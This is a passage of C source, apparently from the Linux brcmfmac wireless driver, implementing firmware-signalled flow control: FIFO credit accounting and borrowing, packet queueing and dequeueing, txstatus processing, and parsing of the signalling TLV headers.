		entry->requested_packet--;
		brcmf_skb_if_flags_set_field(skb, REQUESTED, 1);
		brcmf_skb_if_flags_set_field(skb, REQ_CREDIT, 0);
		if (entry->state != BRCMF_FWS_STATE_CLOSE)
			brcmf_err("requested packet set while mac not closed!\n");
	} else {
		brcmf_skb_if_flags_set_field(skb, REQUESTED, 0);
		brcmf_skb_if_flags_set_field(skb, REQ_CREDIT, 0);
	}
}

/* give back a requested credit when a suppressed skb is requeued */
static void brcmf_fws_macdesc_return_req_credit(struct sk_buff *skb)
{
	struct brcmf_fws_mac_descriptor *entry = brcmf_skbcb(skb)->mac;

	if ((brcmf_skb_if_flags_get_field(skb, REQ_CREDIT)) &&
	    (entry->state == BRCMF_FWS_STATE_CLOSE))
		entry->requested_credit++;
}

/* return tx credits to a fifo; BE credits first repay what was
 * borrowed from the other access categories.
 */
static void brcmf_fws_return_credits(struct brcmf_fws_info *fws,
				     u8 fifo, u8 credits)
{
	int lender_ac;
	int *borrowed;
	int *fifo_credit;

	if (!credits)
		return;

	fws->fifo_credit_map |= 1 << fifo;

	if ((fifo == BRCMF_FWS_FIFO_AC_BE) &&
	    (fws->credits_borrowed[0])) {
		for (lender_ac = BRCMF_FWS_FIFO_AC_VO; lender_ac >= 0;
		     lender_ac--) {
			borrowed = &fws->credits_borrowed[lender_ac];
			if (*borrowed) {
				fws->fifo_credit_map |= (1 << lender_ac);
				fifo_credit = &fws->fifo_credit[lender_ac];
				if (*borrowed >= credits) {
					*borrowed -= credits;
					*fifo_credit +=
					credits;
					return;
				} else {
					credits -= *borrowed;
					*fifo_credit += *borrowed;
					*borrowed = 0;
				}
			}
		}
	}

	fws->fifo_credit[fifo] += credits;
}

/* kick the dequeue worker when delayed traffic can make progress */
static void brcmf_fws_schedule_deq(struct brcmf_fws_info *fws)
{
	/* only schedule dequeue when there are credits for delayed traffic */
	if ((fws->fifo_credit_map & fws->fifo_delay_map) ||
	    (!brcmf_fws_fc_active(fws) && fws->fifo_delay_map))
		queue_work(fws->fws_wq, &fws->fws_dequeue_work);
}

/* queue a packet on its destination's psq; suppressed packets are
 * inserted in free-running-counter order to repair reordering.
 */
static int brcmf_fws_enq(struct brcmf_fws_info *fws,
			 enum brcmf_fws_skb_state state, int fifo,
			 struct sk_buff *p)
{
	/* even precedence = delayed, odd = suppressed (prec + 1 below) */
	int prec = 2 * fifo;
	u32 *qfull_stat = &fws->stats.delayq_full_error;
	struct brcmf_fws_mac_descriptor *entry;
	struct pktq *pq;
	struct sk_buff_head *queue;
	struct sk_buff *p_head;
	struct sk_buff *p_tail;
	u32 fr_new;
	u32 fr_compare;

	entry = brcmf_skbcb(p)->mac;
	if (entry == NULL) {
		brcmf_err("no mac descriptor found for skb %p\n", p);
		return -ENOENT;
	}

	brcmf_dbg(DATA, "enter: fifo %d skb %p\n", fifo, p);
	if (state == BRCMF_FWS_SKBSTATE_SUPPRESSED) {
		prec += 1;
		qfull_stat = &fws->stats.supprq_full_error;

		/* Fix out of order delivery of frames. Dont assume frame */
		/* can be inserted at the end, but look for correct position */
		pq = &entry->psq;
		if (pktq_full(pq) || pktq_pfull(pq, prec)) {
			*qfull_stat += 1;
			return -ENFILE;
		}
		queue = &pq->q[prec].skblist;

		p_head = skb_peek(queue);
		p_tail = skb_peek_tail(queue);
		fr_new = brcmf_skb_htod_tag_get_field(p, FREERUN);

		while (p_head != p_tail) {
			fr_compare = brcmf_skb_htod_tag_get_field(p_tail,
								  FREERUN);
			/* be sure to handle wrap of 256 */
			if (((fr_new > fr_compare) &&
			     ((fr_new - fr_compare) < 128)) ||
			    ((fr_new < fr_compare) &&
			     ((fr_compare - fr_new) > 128)))
				break;

			p_tail = skb_queue_prev(queue, p_tail);
		}
		/* Position found.
		   Determine what to do */
		if (p_tail == NULL) {
			/* empty list */
			__skb_queue_tail(queue, p);
		} else {
			fr_compare = brcmf_skb_htod_tag_get_field(p_tail,
								  FREERUN);
			if (((fr_new > fr_compare) &&
			     ((fr_new - fr_compare) < 128)) ||
			    ((fr_new < fr_compare) &&
			     ((fr_compare - fr_new) > 128))) {
				/* After tail */
				__skb_queue_after(queue, p_tail, p);
			} else {
				/* Before tail */
				__skb_insert(p, p_tail->prev, p_tail, queue);
			}
		}

		/* Complete the counters and statistics */
		pq->len++;
		if (pq->hi_prec < prec)
			pq->hi_prec = (u8) prec;
	} else if (brcmu_pktq_penq(&entry->psq, prec, p) == NULL) {
		*qfull_stat += 1;
		return -ENFILE;
	}

	/* increment total enqueued packet count */
	fws->fifo_delay_map |= 1 << fifo;
	fws->fifo_enqpkt[fifo]++;

	/* update the sk_buff state */
	brcmf_skbcb(p)->state = state;

	/*
	 * A packet has been pushed so update traffic
	 * availability bitmap, if applicable
	 */
	brcmf_fws_tim_update(fws, entry, fifo, true);
	brcmf_fws_flow_control_check(fws, &entry->psq,
				     brcmf_skb_if_flags_get_field(p, INDEX));
	return 0;
}

/* round-robin over all descriptors and pick the next queued packet for
 * the given fifo; suppressed-only entries are drained first.
 */
static struct sk_buff *brcmf_fws_deq(struct brcmf_fws_info *fws, int fifo)
{
	struct brcmf_fws_mac_descriptor *table;
	struct brcmf_fws_mac_descriptor *entry;
	struct sk_buff *p;
	int num_nodes;
	int node_pos;
	int prec_out;
	int pmsk;
	int i;

	/* treat the whole descriptor table (nodes/iface/other) as an array */
	table = (struct brcmf_fws_mac_descriptor *)&fws->desc;
	num_nodes = sizeof(fws->desc) / sizeof(struct brcmf_fws_mac_descriptor);
	node_pos = fws->deq_node_pos[fifo];

	for (i = 0; i < num_nodes; i++) {
		entry = &table[(node_pos + i) % num_nodes];
		if (!entry->occupied ||
		    brcmf_fws_macdesc_closed(fws, entry, fifo))
			continue;

		if (entry->suppressed)
			pmsk = 2;
		else
			pmsk = 3;
		p = brcmu_pktq_mdeq(&entry->psq, pmsk << (fifo * 2), &prec_out);
		if (p == NULL) {
			if (entry->suppressed) {
				if (entry->suppr_transit_count)
					continue;
				entry->suppressed = false;
				p = brcmu_pktq_mdeq(&entry->psq,
						    1 << (fifo * 2), &prec_out);
			}
		}
		if (p == NULL)
			continue;

		brcmf_fws_macdesc_use_req_credit(entry, p);

		/* move dequeue position to ensure fair round-robin */
		fws->deq_node_pos[fifo] = (node_pos + i + 1) % num_nodes;
		brcmf_fws_flow_control_check(fws, &entry->psq,
					     brcmf_skb_if_flags_get_field(p,
									  INDEX)
					     );
		/*
		 * A packet has been picked up, update traffic
		 * availability bitmap, if applicable
		 */
		brcmf_fws_tim_update(fws, entry, fifo, false);

		/*
		 * decrement total enqueued fifo packets and
		 * clear delay bitmap if done.
		 */
		fws->fifo_enqpkt[fifo]--;
		if (fws->fifo_enqpkt[fifo] == 0)
			fws->fifo_delay_map &= ~(1 << fifo);
		goto done;
	}
	p = NULL;
done:
	brcmf_dbg(DATA, "exit: fifo %d skb %p\n", fifo, p);
	return p;
}

/* requeue a firmware-suppressed packet on the suppress queue, updating
 * generation/sequence info; drops it when the suppress queue is full.
 */
static int brcmf_fws_txstatus_suppressed(struct brcmf_fws_info *fws, int fifo,
					 struct sk_buff *skb,
					 u32 genbit, u16 seq)
{
	struct brcmf_fws_mac_descriptor *entry = brcmf_skbcb(skb)->mac;
	u32 hslot;
	int ret;

	hslot = brcmf_skb_htod_tag_get_field(skb, HSLOT);

	/* this packet was suppressed */
	if (!entry->suppressed) {
		entry->suppressed = true;
		entry->suppr_transit_count = entry->transit_count;
		brcmf_dbg(DATA, "suppress %s: transit %d\n",
			  entry->name, entry->transit_count);
	}

	entry->generation = genbit;

	brcmf_skb_htod_tag_set_field(skb, GENERATION, genbit);
	brcmf_skbcb(skb)->htod_seq = seq;
	if (brcmf_skb_htod_seq_get_field(skb, FROMFW)) {
		brcmf_skb_htod_seq_set_field(skb, FROMDRV, 1);
		brcmf_skb_htod_seq_set_field(skb, FROMFW, 0);
	} else {
		brcmf_skb_htod_seq_set_field(skb, FROMDRV, 0);
	}
	ret = brcmf_fws_enq(fws, BRCMF_FWS_SKBSTATE_SUPPRESSED, fifo, skb);

	if (ret != 0) {
		/* suppress q is full drop this packet */
		brcmf_fws_hanger_poppkt(&fws->hanger, hslot, &skb, true);
	} else {
		/*
		 * Mark suppressed to avoid a double free during
		 * wlfc cleanup
		 */
		brcmf_fws_hanger_mark_suppressed(&fws->hanger, hslot);
	}

	return ret;
}

/* process one txstatus from firmware: account credits, and either
 * finalize the packet or requeue it when it was suppressed.
 */
static int
brcmf_fws_txs_process(struct brcmf_fws_info *fws, u8 flags, u32 hslot,
		      u32 genbit, u16 seq)
{
	u32 fifo;
	int ret;
	bool remove_from_hanger = true;
	struct sk_buff *skb;
	struct brcmf_skbuff_cb *skcb;
	struct brcmf_fws_mac_descriptor *entry = NULL;
	struct brcmf_if *ifp;

	brcmf_dbg(DATA, "flags %d\n", flags);

	if (flags
	    == BRCMF_FWS_TXSTATUS_DISCARD)
		fws->stats.txs_discard++;
	else if (flags == BRCMF_FWS_TXSTATUS_CORE_SUPPRESS) {
		fws->stats.txs_supp_core++;
		/* suppressed packets stay in the hanger for re-transmission */
		remove_from_hanger = false;
	} else if (flags == BRCMF_FWS_TXSTATUS_FW_PS_SUPPRESS) {
		fws->stats.txs_supp_ps++;
		remove_from_hanger = false;
	} else if (flags == BRCMF_FWS_TXSTATUS_FW_TOSSED)
		fws->stats.txs_tossed++;
	else if (flags == BRCMF_FWS_TXSTATUS_HOST_TOSSED)
		fws->stats.txs_host_tossed++;
	else
		brcmf_err("unexpected txstatus\n");

	ret = brcmf_fws_hanger_poppkt(&fws->hanger, hslot, &skb,
				      remove_from_hanger);
	if (ret != 0) {
		brcmf_err("no packet in hanger slot: hslot=%d\n", hslot);
		return ret;
	}

	skcb = brcmf_skbcb(skb);
	entry = skcb->mac;
	if (WARN_ON(!entry)) {
		brcmu_pkt_buf_free_skb(skb);
		return -EINVAL;
	}
	entry->transit_count--;
	if (entry->suppressed && entry->suppr_transit_count)
		entry->suppr_transit_count--;

	brcmf_dbg(DATA, "%s flags %d htod %X seq %X\n", entry->name, flags,
		  skcb->htod, seq);

	/* pick up the implicit credit from this packet */
	fifo = brcmf_skb_htod_tag_get_field(skb, FIFO);
	if ((fws->fcmode == BRCMF_FWS_FCMODE_IMPLIED_CREDIT) ||
	    (brcmf_skb_if_flags_get_field(skb, REQ_CREDIT)) ||
	    (flags == BRCMF_FWS_TXSTATUS_HOST_TOSSED)) {
		brcmf_fws_return_credits(fws, fifo, 1);
		brcmf_fws_schedule_deq(fws);
	}
	brcmf_fws_macdesc_return_req_credit(skb);

	ret = brcmf_proto_hdrpull(fws->drvr, false, skb, &ifp);
	if (ret) {
		brcmu_pkt_buf_free_skb(skb);
		return -EINVAL;
	}
	if (!remove_from_hanger)
		ret = brcmf_fws_txstatus_suppressed(fws, fifo, skb,
						    genbit, seq);
	/* finalize when the packet is done, or when re-queueing failed */
	if (remove_from_hanger || ret)
		brcmf_txfinalize(ifp, skb, true);

	return 0;
}

/* Handle a FIFO_CREDITBACK TLV: return the per-fifo credits the firmware
 * just handed back. Only meaningful in explicit-credit flow-control mode.
 */
static int brcmf_fws_fifocreditback_indicate(struct brcmf_fws_info *fws,
					     u8 *data)
{
	int i;

	if (fws->fcmode != BRCMF_FWS_FCMODE_EXPLICIT_CREDIT) {
		brcmf_dbg(INFO, "ignored\n");
		return BRCMF_FWS_RET_OK_NOSCHEDULE;
	}

	brcmf_dbg(DATA, "enter: data %pM\n", data);
	brcmf_fws_lock(fws);
	/* one credit byte per fifo */
	for (i = 0; i < BRCMF_FWS_FIFO_COUNT; i++)
		brcmf_fws_return_credits(fws, i, data[i]);

	brcmf_dbg(DATA, "map: credit %x delay %x\n", fws->fifo_credit_map,
		  fws->fifo_delay_map);
	brcmf_fws_unlock(fws);
	return BRCMF_FWS_RET_OK_SCHEDULE;
}

/* Handle a TXSTATUS TLV: decode the little-endian status word (and the
 * optional reused sequence number) and feed it to brcmf_fws_txs_process().
 */
static int brcmf_fws_txstatus_indicate(struct brcmf_fws_info *fws, u8 *data)
{
	__le32 status_le;
	__le16 seq_le;
	u32 status;
	u32 hslot;
	u32 genbit;
	u8 flags;
	u16 seq;

	fws->stats.txs_indicate++;
	memcpy(&status_le, data, sizeof(status_le));
	status = le32_to_cpu(status_le);
	flags = brcmf_txstatus_get_field(status, FLAGS);
	hslot = brcmf_txstatus_get_field(status, HSLOT);
	genbit = brcmf_txstatus_get_field(status, GENERATION);
	if (BRCMF_FWS_MODE_GET_REUSESEQ(fws->mode)) {
		/* sequence number follows the packet tag when seq-reuse is on */
		memcpy(&seq_le, &data[BRCMF_FWS_TYPE_PKTTAG_LEN],
		       sizeof(seq_le));
		seq = le16_to_cpu(seq_le);
	} else {
		seq = 0;
	}

	brcmf_fws_lock(fws);
	brcmf_fws_txs_process(fws, flags, hslot, genbit, seq);
	brcmf_fws_unlock(fws);
	return BRCMF_FWS_RET_OK_NOSCHEDULE;
}

/* Debug helper for TRANS_ID TLVs: log the sequence byte and the
 * little-endian timestamp that follows it.
 */
static int brcmf_fws_dbg_seqnum_check(struct brcmf_fws_info *fws, u8 *data)
{
	__le32 timestamp;

	memcpy(&timestamp, &data[2], sizeof(timestamp));
	brcmf_dbg(CTL, "received: seq %d, timestamp %d\n", data[1],
		  le32_to_cpu(timestamp));
	return 0;
}

/* Event handler for BRCMF_E_FIFO_CREDIT_MAP: record the initial per-fifo
 * credit counts announced by the firmware (processed only once).
 */
static int brcmf_fws_notify_credit_map(struct brcmf_if *ifp,
				       const struct brcmf_event_msg *e,
				       void *data)
{
	struct brcmf_fws_info *fws = ifp->drvr->fws;
	int i;
	u8 *credits = data;

	if (e->datalen < BRCMF_FWS_FIFO_COUNT) {
		brcmf_err("event payload too small (%d)\n", e->datalen);
		return -EINVAL;
	}
	/* only the first credit map is applied */
	if (fws->creditmap_received)
		return 0;

	fws->creditmap_received = true;

	brcmf_dbg(TRACE, "enter: credits %pM\n", credits);
	brcmf_fws_lock(fws);
	for (i = 0; i < ARRAY_SIZE(fws->fifo_credit); i++) {
		if (*credits)
			fws->fifo_credit_map |= 1 << i;
		else
			fws->fifo_credit_map &= ~(1 << i);
		fws->fifo_credit[i] = *credits++;
	}
	brcmf_fws_schedule_deq(fws);
	brcmf_fws_unlock(fws);
	return 0;
}

/* Event handler for BRCMF_E_BCMC_CREDIT_SUPPORT: enable credit checking
 * for the broadcast/multicast fifo.
 */
static int brcmf_fws_notify_bcmc_credit_support(struct brcmf_if *ifp,
						const struct brcmf_event_msg *e,
						void *data)
{
	struct brcmf_fws_info *fws = ifp->drvr->fws;

	brcmf_fws_lock(fws);
	/* NOTE(review): fws is dereferenced by brcmf_fws_lock() before this
	 * NULL check, so the check is ineffective as written — confirm
	 * whether fws can actually be NULL on this event path.
	 */
	if (fws)
		fws->bcmc_credit_check = true;
	brcmf_fws_unlock(fws);
	return 0;
}

/* Parse and strip the firmware-signalling header (a sequence of TLVs, plus
 * single-byte FILLER padding) from the front of a received packet, dispatch
 * each TLV to its handler, and schedule a dequeue if any handler asks for it.
 * The signalling bytes are pulled off the skb in all cases.
 */
void brcmf_fws_hdrpull(struct brcmf_if *ifp, s16 siglen, struct sk_buff *skb)
{
	struct brcmf_skb_reorder_data *rd;
	struct brcmf_fws_info *fws = ifp->drvr->fws;
	u8 *signal_data;
	s16 data_len;
	u8 type;
	u8 len;
	u8 *data;
	s32 status;
	s32 err;

	brcmf_dbg(HDRS, "enter: ifidx %d, skblen %u, sig %d\n",
		  ifp->ifidx, skb->len, siglen);

	WARN_ON(siglen > skb->len);

	if (!siglen)
		return;
	/* if flow control disabled, skip to packet data and leave */
	if ((!fws) || (!fws->fw_signals)) {
		skb_pull(skb, siglen);
		return;
	}

	fws->stats.header_pulls++;
	data_len = siglen;
	signal_data = skb->data;

	status = BRCMF_FWS_RET_OK_NOSCHEDULE;

	while (data_len > 0) {
		/* extract tlv info */
		type = signal_data[0];

		/* FILLER type is actually not a TLV, but
		 * a single byte that can be skipped.
		 */
		if (type == BRCMF_FWS_TYPE_FILLER) {
			signal_data += 1;
			data_len -= 1;
			continue;
		}
		len = signal_data[1];
		data = signal_data + 2;

		brcmf_dbg(HDRS, "tlv type=%s (%d), len=%d (%d)\n",
			  brcmf_fws_get_tlv_name(type), type, len,
			  brcmf_fws_get_tlv_len(fws, type));

		/* abort parsing when length invalid */
		if (data_len < len + 2)
			break;

		if (len < brcmf_fws_get_tlv_len(fws, type))
			break;

		err = BRCMF_FWS_RET_OK_NOSCHEDULE;
		switch (type) {
		case BRCMF_FWS_TYPE_COMP_TXSTATUS:
			break;
		case BRCMF_FWS_TYPE_HOST_REORDER_RXPKTS:
			/* stash reorder info in the skb control buffer for
			 * later processing by the receive path
			 */
			rd = (struct brcmf_skb_reorder_data *)skb->cb;
			rd->reorder = data;
			break;
		case BRCMF_FWS_TYPE_MACDESC_ADD:
		case BRCMF_FWS_TYPE_MACDESC_DEL:
			brcmf_fws_macdesc_indicate(fws, type, data);
			break;
		case BRCMF_FWS_TYPE_MAC_OPEN:
		case BRCMF_FWS_TYPE_MAC_CLOSE:
			err = brcmf_fws_macdesc_state_indicate(fws, type, data);
			break;
		case BRCMF_FWS_TYPE_INTERFACE_OPEN:
		case BRCMF_FWS_TYPE_INTERFACE_CLOSE:
			err = brcmf_fws_interface_state_indicate(fws, type,
								 data);
			break;
		case BRCMF_FWS_TYPE_MAC_REQUEST_CREDIT:
		case BRCMF_FWS_TYPE_MAC_REQUEST_PACKET:
			err = brcmf_fws_request_indicate(fws, type, data);
			break;
		case BRCMF_FWS_TYPE_TXSTATUS:
			brcmf_fws_txstatus_indicate(fws, data);
			break;
		case BRCMF_FWS_TYPE_FIFO_CREDITBACK:
			err = brcmf_fws_fifocreditback_indicate(fws, data);
			break;
		case BRCMF_FWS_TYPE_RSSI:
			brcmf_fws_rssi_indicate(fws, *data);
			break;
		case BRCMF_FWS_TYPE_TRANS_ID:
			brcmf_fws_dbg_seqnum_check(fws, data);
			break;
		case BRCMF_FWS_TYPE_PKTTAG:
		case BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP:
		default:
			fws->stats.tlv_invalid_type++;
			break;
		}
		/* latch a schedule request from any handler */
		if (err == BRCMF_FWS_RET_OK_SCHEDULE)
			status = BRCMF_FWS_RET_OK_SCHEDULE;
		signal_data += len + 2;
		data_len -= len + 2;
	}

	/* leftover bytes mean the TLV stream was malformed */
	if (data_len != 0)
		fws->stats.tlv_parse_failed++;

	if (status == BRCMF_FWS_RET_OK_SCHEDULE)
		brcmf_fws_schedule_deq(fws);

	/* signalling processing result does
	 * not affect the actual ethernet packet.
	 */
	skb_pull(skb, siglen);

	/* this may be a signal-only packet */
	if (skb->len == 0)
		fws->stats.header_only_pkt++;
}

/* Stamp the host-to-device tag flags (generation, from-host, requested) on a
 * packet just before it is committed to the bus; returns the data offset
 * produced by brcmf_fws_hdrpush().
 */
static u8 brcmf_fws_precommit_skb(struct brcmf_fws_info *fws, int fifo,
				  struct sk_buff *p)
{
	struct brcmf_skbuff_cb *skcb = brcmf_skbcb(p);
	struct brcmf_fws_mac_descriptor *entry = skcb->mac;
	u8 flags;

	/* suppressed packets keep the generation assigned at suppression */
	if (skcb->state != BRCMF_FWS_SKBSTATE_SUPPRESSED)
		brcmf_skb_htod_tag_set_field(p, GENERATION, entry->generation);
	flags = BRCMF_FWS_HTOD_FLAG_PKTFROMHOST;
	if (brcmf_skb_if_flags_get_field(p, REQUESTED)) {
		/*
		 * Indicate that this packet is being sent in response to an
		 * explicit request from the firmware side.
		 */
		flags |= BRCMF_FWS_HTOD_FLAG_PKT_REQUESTED;
	}
	brcmf_skb_htod_tag_set_field(p, FLAGS, flags);
	return brcmf_fws_hdrpush(fws, p);
}

/* Put a packet that failed bus transmission back at the head of its
 * precedence queue. On rollback failure the packet is tossed via the
 * txstatus path; on success the spent credit is returned.
 */
static void brcmf_fws_rollback_toq(struct brcmf_fws_info *fws,
				   struct sk_buff *skb, int fifo)
{
	struct brcmf_fws_mac_descriptor *entry;
	struct sk_buff *pktout;
	int qidx, hslot;
	int rc = 0;

	entry = brcmf_skbcb(skb)->mac;
	if (entry->occupied) {
		/* two precedences per fifo; suppressed packets use the odd one */
		qidx = 2 * fifo;
		if (brcmf_skbcb(skb)->state == BRCMF_FWS_SKBSTATE_SUPPRESSED)
			qidx++;

		pktout = brcmu_pktq_penq_head(&entry->psq, qidx, skb);
		if (pktout == NULL) {
			brcmf_err("%s queue %d full\n", entry->name, qidx);
			rc = -ENOSPC;
		}
	} else {
		brcmf_err("%s entry removed\n", entry->name);
		rc = -ENOENT;
	}

	if (rc) {
		fws->stats.rollback_failed++;
		hslot = brcmf_skb_htod_tag_get_field(skb, HSLOT);
		brcmf_fws_txs_process(fws, BRCMF_FWS_TXSTATUS_HOST_TOSSED,
				      hslot, 0, 0);
	} else {
		fws->stats.rollback_success++;
		brcmf_fws_return_credits(fws, fifo, 1);
		brcmf_fws_macdesc_return_req_credit(skb);
	}
}

/* Borrow one credit for the BE fifo from another access category (lowest AC
 * first). Returns 0 when a credit was borrowed, -ENAVAIL otherwise; the BE
 * bit in the credit map is updated to match.
 */
static int brcmf_fws_borrow_credit(struct brcmf_fws_info *fws)
{
	int lender_ac;

	/* borrowing is deferred for a while after higher-AC traffic was seen */
	if (time_after(fws->borrow_defer_timestamp, jiffies)) {
		fws->fifo_credit_map &= ~(1 << BRCMF_FWS_FIFO_AC_BE);
		return -ENAVAIL;
	}

	for (lender_ac = 0; lender_ac <= BRCMF_FWS_FIFO_AC_VO; lender_ac++) {
		if (fws->fifo_credit[lender_ac]) {
			fws->credits_borrowed[lender_ac]++;
			fws->fifo_credit[lender_ac]--;
			if (fws->fifo_credit[lender_ac] == 0)
				fws->fifo_credit_map &= ~(1 << lender_ac);
			fws->fifo_credit_map |= (1 << BRCMF_FWS_FIFO_AC_BE);
			brcmf_dbg(DATA, "borrow credit from: %d\n", lender_ac);
			return 0;
		}
	}
	fws->fifo_credit_map &= ~(1 << BRCMF_FWS_FIFO_AC_BE);
	return -ENAVAIL;
}

/* Hand a packet to the protocol layer for bus transmission. The fws lock is
 * dropped around brcmf_proto_txdata() and re-acquired afterwards; on failure
 * the transit counters are undone and the packet is rolled back to its queue.
 */
static int brcmf_fws_commit_skb(struct brcmf_fws_info *fws, int fifo,
				struct sk_buff *skb)
{
	struct brcmf_skbuff_cb *skcb = brcmf_skbcb(skb);
	struct brcmf_fws_mac_descriptor *entry;
	int rc;
	u8 ifidx;
	u8 data_offset;

	entry = skcb->mac;
	if (IS_ERR(entry))
		return PTR_ERR(entry);

	data_offset = brcmf_fws_precommit_skb(fws, fifo, skb);
	entry->transit_count++;
	if (entry->suppressed)
		entry->suppr_transit_count++;
	ifidx = brcmf_skb_if_flags_get_field(skb, INDEX);
	/* drop the lock while the packet is handed to the bus */
	brcmf_fws_unlock(fws);
	rc = brcmf_proto_txdata(fws->drvr, ifidx, data_offset, skb);
	brcmf_fws_lock(fws);
	brcmf_dbg(DATA, "%s flags %X htod %X bus_tx %d\n", entry->name,
		  skcb->if_flags, skcb->htod, rc);
	if (rc < 0) {
		entry->transit_count--;
		if (entry->suppressed)
			entry->suppr_transit_count--;
		(void)brcmf_proto_hdrpull(fws->drvr, false, skb, NULL);
		goto rollback;
	}

	fws->stats.pkt2bus++;
	fws->stats.send_pkts[fifo]++;
	if (brcmf_skb_if_flags_get_field(skb, REQUESTED))
		fws->stats.requested_sent[fifo]++;

	return rc;

rollback:
	brcmf_fws_rollback_toq(fws, skb, fifo);
	return rc;
}

/* Assign the host-to-device tag for a new packet: pick a free hanger slot,
 * stamp slot/freerun/fifo fields, and push the packet into the hanger. The
 * per-fifo freerun sequence advances only on success.
 */
static int brcmf_fws_assign_htod(struct brcmf_fws_info *fws, struct sk_buff *p,
				 int fifo)
{
	struct brcmf_skbuff_cb *skcb = brcmf_skbcb(p);
	int rc, hslot;

	skcb->htod = 0;
	skcb->htod_seq = 0;
	hslot = brcmf_fws_hanger_get_free_slot(&fws->hanger);
	brcmf_skb_htod_tag_set_field(p, HSLOT, hslot);
	brcmf_skb_htod_tag_set_field(p, FREERUN, skcb->mac->seq[fifo]);
	brcmf_skb_htod_tag_set_field(p, FIFO, fifo);
	rc = brcmf_fws_hanger_pushpkt(&fws->hanger, p, hslot);
	if (!rc)
		skcb->mac->seq[fifo]++;
	else
		fws->stats.generic_error++;
	return rc;
}

/* Entry point for outgoing data frames: classify priority, bypass queueing
 * when avoid_queueing is set, otherwise tag the packet and enqueue it for
 * the dequeue worker.
 */
int brcmf_fws_process_skb(struct brcmf_if *ifp, struct sk_buff *skb)
{
	struct brcmf_pub *drvr = ifp->drvr;
	struct brcmf_fws_info *fws = drvr->fws;
	struct brcmf_skbuff_cb *skcb = brcmf_skbcb(skb);
	struct ethhdr *eh = (struct ethhdr *)(skb->data);
	int fifo = BRCMF_FWS_FIFO_BCMC;
	bool multicast = is_multicast_ether_addr(eh->h_dest);
	int rc = 0;

	brcmf_dbg(DATA, "tx proto=0x%X\n", ntohs(eh->h_proto));

	/* determine the priority */
	if (!skb->priority)
		skb->priority = cfg80211_classify8021d(skb, NULL);

	drvr->tx_multicast += !!multicast;

	/* fast path: no firmware flow control, send straight to the bus */
	if (fws->avoid_queueing) {
		rc = brcmf_proto_txdata(drvr, ifp->ifidx, 0, skb);
		if (rc < 0)
			brcmf_txfinalize(ifp, skb, false);
		return rc;
	}

	/* set control buffer information */
	skcb->if_flags = 0;
	skcb->state = BRCMF_FWS_SKBSTATE_NEW;
	brcmf_skb_if_flags_set_field(skb, INDEX, ifp->ifidx);
	/* unicast frames map 802.1d priority to an AC fifo; multicast stays
	 * on the BCMC fifo
	 */
	if (!multicast)
		fifo = brcmf_fws_prio2fifo[skb->priority];

	brcmf_fws_lock(fws);
	/* non-BE unicast traffic defers BE credit borrowing for a while */
	if (fifo != BRCMF_FWS_FIFO_AC_BE && fifo < BRCMF_FWS_FIFO_BCMC)
		fws->borrow_defer_timestamp = jiffies +
					      BRCMF_FWS_BORROW_DEFER_PERIOD;

	skcb->mac = brcmf_fws_macdesc_find(fws, ifp, eh->h_dest);
	brcmf_dbg(DATA, "%s mac %pM multi %d fifo %d\n", skcb->mac->name,
		  eh->h_dest, multicast, fifo);

	if (!brcmf_fws_assign_htod(fws, skb, fifo)) {
		brcmf_fws_enq(fws, BRCMF_FWS_SKBSTATE_DELAYED, fifo, skb);
		brcmf_fws_schedule_deq(fws);
	} else {
		brcmf_err("drop skb: no hanger slot\n");
		brcmf_txfinalize(ifp, skb, false);
		rc = -ENOMEM;
	}
	brcmf_fws_unlock(fws);

	return rc;
}

/* Re-initialize the mac descriptor bound to an interface, if any. */
void brcmf_fws_reset_interface(struct brcmf_if *ifp)
{
	struct brcmf_fws_mac_descriptor *entry = ifp->fws_desc;

	brcmf_dbg(TRACE, "enter: idx=%d\n", ifp->bssidx);
	if (!entry)
		return;

	brcmf_fws_macdesc_init(entry, ifp->mac_addr, ifp->ifidx);
}

/* Bind a mac descriptor (and its precedence queue) to a newly added
 * interface. Interfaces without a netdev are skipped.
 */
void brcmf_fws_add_interface(struct brcmf_if *ifp)
{
	struct brcmf_fws_info *fws = ifp->drvr->fws;
	struct brcmf_fws_mac_descriptor *entry;

	if (!ifp->ndev)
		return;

	entry = &fws->desc.iface[ifp->ifidx];
	ifp->fws_desc = entry;
	brcmf_fws_macdesc_init(entry, ifp->mac_addr, ifp->ifidx);
	brcmf_fws_macdesc_set_name(fws, entry);
	brcmu_pktq_init(&entry->psq, BRCMF_FWS_PSQ_PREC_COUNT,
			BRCMF_FWS_PSQ_LEN);
	brcmf_dbg(TRACE, "added %s\n", entry->name);
}

/* Detach an interface's mac descriptor and clean up any of its queued
 * packets under the fws lock.
 */
void brcmf_fws_del_interface(struct brcmf_if *ifp)
{
	struct brcmf_fws_mac_descriptor *entry = ifp->fws_desc;

	if (!entry)
		return;

	brcmf_fws_lock(ifp->drvr->fws);
	ifp->fws_desc = NULL;
	brcmf_dbg(TRACE, "deleting %s\n", entry->name);
	brcmf_fws_macdesc_deinit(entry);
	brcmf_fws_cleanup(ifp->drvr->fws, ifp->ifidx);
	brcmf_fws_unlock(ifp->drvr->fws);
}

/* Workqueue worker: drain queued packets to the bus, highest fifo first.
 * When flow control is inactive packets bypass the credit accounting; when
 * active, packets are committed while credits remain, and the BE fifo may
 * borrow credits from other ACs once its own are exhausted.
 */
static void brcmf_fws_dequeue_worker(struct work_struct *worker)
{
	struct brcmf_fws_info *fws;
	struct brcmf_pub *drvr;
	struct sk_buff *skb;
	int fifo;
	u32 hslot;
	u32 ifidx;
	int ret;

	fws = container_of(worker, struct brcmf_fws_info, fws_dequeue_work);
	drvr = fws->drvr;
	brcmf_fws_lock(fws);
	for (fifo = BRCMF_FWS_FIFO_BCMC; fifo >= 0 && !fws->bus_flow_blocked;
	     fifo--) {
		if (!brcmf_fws_fc_active(fws)) {
			/* flow control inactive: pop from hanger and send
			 * directly through the protocol layer
			 */
			while ((skb = brcmf_fws_deq(fws, fifo)) != NULL) {
				hslot = brcmf_skb_htod_tag_get_field(skb,
								     HSLOT);
				brcmf_fws_hanger_poppkt(&fws->hanger, hslot,
							&skb, true);
				ifidx = brcmf_skb_if_flags_get_field(skb,
								     INDEX);
				/* Use proto layer to send data frame */
				brcmf_fws_unlock(fws);
				ret = brcmf_proto_txdata(drvr, ifidx, 0, skb);
				brcmf_fws_lock(fws);
				if (ret < 0)
					brcmf_txfinalize(brcmf_get_ifp(drvr,
								       ifidx),
							 skb, false);
				if (fws->bus_flow_blocked)
					break;
			}
			continue;
		}
		/* credit-controlled path; BCMC may skip credit checking */
